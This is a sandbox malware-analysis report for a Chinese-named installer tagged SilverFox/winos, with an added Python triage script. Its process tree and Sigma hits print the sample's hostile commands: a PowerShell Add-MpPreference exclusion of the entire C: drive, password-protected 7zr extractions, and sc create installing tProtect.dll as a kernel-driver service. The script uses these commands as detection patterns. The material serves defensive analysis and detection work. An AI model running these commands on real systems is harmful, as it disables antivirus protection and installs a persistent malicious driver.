Windows Analysis Report
#U5b89#U88c5#U52a9#U624b1.0.2.exe

Overview

General Information

Sample name: #U5b89#U88c5#U52a9#U624b1.0.2.exe (Joe Sandbox's #Uxxxx escaping of the non-ASCII file name 安装助手1.0.2.exe, "Installation Assistant 1.0.2.exe"; the same escaped form appears throughout the process tree and signature output below)
renamed because original name is a hash value
Original sample name: 1.0.2.exe
Analysis ID: 1580228
MD5: 315719354db8520278ae3d022b90da14
SHA1: 46a92e47bdea70bef469eca470bb3b280f0fcd06
SHA256: e9d2969683bcc59dee33d048904b3bfb7af7b140ce360a326bb5bb9b3ef3b57e
Tags: exe, SilverFox, winos, user-kafan_shengui

Detection

Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • #U5b89#U88c5#U52a9#U624b1.0.2.exe (PID: 2640 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" MD5: 315719354DB8520278AE3D022B90DA14)
    • #U5b89#U88c5#U52a9#U624b1.0.2.tmp (PID: 6112 cmdline: "C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp" /SL5="$1043E,5031707,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" MD5: FFE4B45A6AE66BCB0FA01197725E2E27)
      • powershell.exe (PID: 5104 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 4092 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U5b89#U88c5#U52a9#U624b1.0.2.exe (PID: 6932 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" /VERYSILENT MD5: 315719354DB8520278AE3D022B90DA14)
        • #U5b89#U88c5#U52a9#U624b1.0.2.tmp (PID: 6768 cmdline: "C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp" /SL5="$100214,5031707,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" /VERYSILENT MD5: FFE4B45A6AE66BCB0FA01197725E2E27)
          • 7zr.exe (PID: 4476 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 1880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 4852 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 2260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4852 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • sc.exe (PID: 2640 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • conhost.exe (PID: 5472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2060 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6016 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6816 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2536 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2060 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1816 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4280 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1780 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5812 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1904 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2260 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3652 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 1904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4408 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6320 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5460 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2536 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4280 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6120 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6828 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3468 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 984 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1880 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1360 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1720 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 928 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2364 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2060 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2640 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5800 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1904 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6832 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5012 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2060 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6120 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4856 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3744 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 928 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4852 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3652 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2060 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 396 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2120 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6548 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 980 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3052 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5868 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5684 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6832 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2944 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5960 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2180 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5012 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 984 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 396 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1780 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3060 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2080 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2668 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5868 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1904 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1816 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 396 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6320 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
No configs have been found
No yara matches

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp" /SL5="$1043E,5031707,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp, ParentProcessId: 6112, ParentProcessName: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 5104, ProcessName: powershell.exe
Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems), Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2060, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 6016, ProcessName: sc.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp" /SL5="$1043E,5031707,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp, ParentProcessId: 6112, ParentProcessName: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 5104, ProcessName: powershell.exe
Source: Process started, Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community, Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2060, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 6016, ProcessName: sc.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp" /SL5="$1043E,5031707,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp, ParentProcessId: 6112, ParentProcessName: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 5104, ProcessName: powershell.exe
No Suricata rule has matched
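The process tree and the Sigma hits above describe one chain: an Inno Setup installer (the is-*.tmp/SL5 pattern) excludes the whole C: drive from Defender, drops 7zr.exe and extracts two password-protected archives into "C:\Program Files (x86)\Windows NT", registers tProtect.dll as a kernel service named CleverSoar with sc create type= kernel, and then issues sc start CleverSoar dozens of times. The script below is an added example, this editor's code and not part of the Joe Sandbox report or any vendor tooling: it runs four triage rules over process-creation records. The EVENTS list is hand-built from the command lines in the tree (Sysmon event 1 field names), with one constructed benign control, and is not a captured log.

```python
"""Triage the process chain above. Added example, not part of the Joe Sandbox
report: the rules are this editor's, and EVENTS is hand-built from the command
lines in the process tree (Sysmon event 1 field names), not a captured log."""
import re
from collections import Counter
from typing import Dict, List

Event = Dict[str, str]
Finding = Dict[str, str]

# Constructed from the report's process tree, plus one benign control event.
EVENTS: List[Event] = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "\"powershell.exe\" -Command \"Add-MpPreference -ExclusionPath 'C:\\'\"",
     "ParentImage": r"C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp"},
    {"Image": r"C:\Program Files (x86)\Windows NT\7zr.exe",
     "CommandLine": "7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald",
     "ParentImage": r"C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp"},
    {"Image": r"C:\Windows\System32\sc.exe",
     "CommandLine": 'sc create CleverSoar displayname= CleverSoar binPath= '
                    '"C:\\Program Files (x86)\\Windows NT\\tProtect.dll" type= kernel start= auto',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\sc.exe", "CommandLine": "sc start CleverSoar",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\sc.exe", "CommandLine": "sc start CleverSoar",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    # Benign control (constructed): an interactive admin excluding one build directory.
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -Command \"Add-MpPreference -ExclusionPath 'C:\\build\\out'\"",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

RE_EXCLUSION = re.compile(
    r"Add-MpPreference\s+-Exclusion(?P<kind>Path|Process|Extension)\s+"
    r"(?P<value>'[^']*'|\"[^\"]*\"|\S+)", re.IGNORECASE)
RE_SC_CREATE = re.compile(
    r"\bsc(?:\.exe)?\s+create\s+(?P<name>\S+).*?binPath=\s*(?P<bin>\"[^\"]*\"|\S+)"
    r".*?\btype=\s*kernel\b", re.IGNORECASE | re.DOTALL)
RE_SC_START = re.compile(r"\bsc(?:\.exe)?\s+start\s+(?P<name>\S+)", re.IGNORECASE)
RE_7Z_EXTRACT = re.compile(r"\b7z[ar]?(?:\.exe)?\s+x\b(?P<rest>.*)", re.IGNORECASE)


def _unquote(token: str) -> str:
    return token.strip().strip("\"'")


def _is_drive_root(path: str) -> bool:
    return re.fullmatch(r"[A-Za-z]:\\?", path) is not None


def _parent_is_temp(parent: str) -> bool:
    return "\\appdata\\local\\temp\\" in parent.lower()


def _check_exclusion(ev: Event) -> List[Finding]:
    m = RE_EXCLUSION.search(ev["CommandLine"])
    if not m:
        return []
    value = _unquote(m.group("value"))
    # Whole-drive exclusions, or any exclusion added by something running out of
    # %TEMP%, match the report; a narrow path from an interactive parent does not.
    high = _is_drive_root(value) or _parent_is_temp(ev["ParentImage"])
    return [{"rule": "defender_exclusion", "severity": "high" if high else "medium",
             "evidence": f"{m.group('kind')}={value}"}]


def _check_kernel_service(ev: Event) -> List[Finding]:
    m = RE_SC_CREATE.search(ev["CommandLine"])
    if not m:
        return []
    bin_path = _unquote(m.group("bin"))
    low = bin_path.lower()
    # A kernel service whose image lives outside System32\drivers or is not a .sys
    # is the CleverSoar/tProtect.dll pattern.
    suspicious = "\\windows\\system32\\drivers\\" not in low or not low.endswith(".sys")
    return [{"rule": "kernel_driver_service", "severity": "high" if suspicious else "medium",
             "evidence": f"{m.group('name')} -> {bin_path}"}]


def _check_archive(ev: Event) -> List[Finding]:
    m = RE_7Z_EXTRACT.search(ev["CommandLine"])
    if not m:
        return []
    tokens = m.group("rest").split()
    archive = next((t for t in tokens if not t.startswith("-")), "?")
    pw = next((t[2:] for t in tokens if t.lower().startswith("-p")), None)
    if pw is None:          # plain extraction is too common to flag on its own
        return []
    return [{"rule": "password_archive_extraction", "severity": "medium",
             "evidence": f"{archive} (password on command line: {pw})"}]


def triage(events: List[Event]) -> List[Finding]:
    findings: List[Finding] = []
    starts: Counter = Counter()
    for ev in events:
        for check in (_check_exclusion, _check_kernel_service, _check_archive):
            findings.extend(check(ev))
        m = RE_SC_START.search(ev["CommandLine"])
        if m:
            starts[m.group("name")] += 1
    for name, n in starts.items():
        if n >= 2:          # the report shows the same start command issued repeatedly
            findings.append({"rule": "repeated_service_start", "severity": "medium",
                             "evidence": f"{name} started {n} times"})
    return findings


if __name__ == "__main__":
    for f in triage(EVENTS):
        print(f"[{f['severity']:>6}] {f['rule']}: {f['evidence']}")
```

The password in the 7zr.exe command line is itself an indicator: it lets a responder open res.dat and locale3.dat from a disk image without running anything, and it is a stable string to pivot on across related installers. The archive password is not in the dropped files' hashes, so hash-only blocking misses repackaged variants that keep the same extraction command.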

AV Detection

Source: C:\Program Files (x86)\Windows NT\hrsw.vbc, Virustotal: Detection: 15%
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exe, Virustotal: Detection: 6%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 90.0% probability
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
